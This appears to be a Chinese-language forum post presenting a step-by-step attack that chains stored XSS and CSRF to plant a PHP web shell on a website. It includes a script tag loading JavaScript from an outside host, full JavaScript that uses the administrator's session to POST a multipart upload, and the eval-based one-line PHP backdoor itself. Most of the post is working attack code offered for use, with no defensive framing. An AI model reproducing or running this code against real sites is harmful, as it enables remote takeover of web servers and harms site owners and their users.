初来乍到,分享自己的一点心得,希望能对各位有用。
标题:xss+csrf上传一句话
前提条件:必须知道后台上传点。
1、找到存在xss的地方提交代码:例如:<script src=http://xxx.com/js.js></script>
2、构造该js.
var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions); } catch(e) {} } } xmlhttp=request; var url= "http://www.xxxx.com/admin/upload.php";//这里是上传位置 var params="-----------------------------223972503529236\r\n"+ "Content-Disposition: form-data; name=\"title\"\r\n"+ "\r\n"+ "\r\n"+ "-----------------------------223972503529236\r\n"+ "Content-Disposition: form-data; name=\"name\"\r\n"+ "\r\n"+ "\r\n"+ "-----------------------------223972503529236\r\n"+ "Content-Disposition: form-data; name=\"file\"; filename=\"yjh.php\"\r\n"+ "Content-Type: application/octet-stream\r\n"+ "\r\n"+ "<?php @eval($_POST[\'cmd\'])?>\r\n"+ "-----------------------------223972503529236--\r\n";//这些信息可以通过本地架设后台上传点抓包获得。 xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Accept", "text/ html ,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xmlhttp.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3"); xmlhttp.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------223972503529236"); xmlhttp.withCredentials = "true"; var aBody = new Uint8Array(params.length); for (var i = 0; i < aBody.length; i++) aBody[i] = params.charCodeAt(i); xmlhttp.send(new Blob([aBody]));
3、等待管理在后台查看你发送到这个xss,这样一句话也就上传成功了。
查看更多关于xss+csrf,看我如何上传一句话 - 网站安全 - 自学p的详细内容...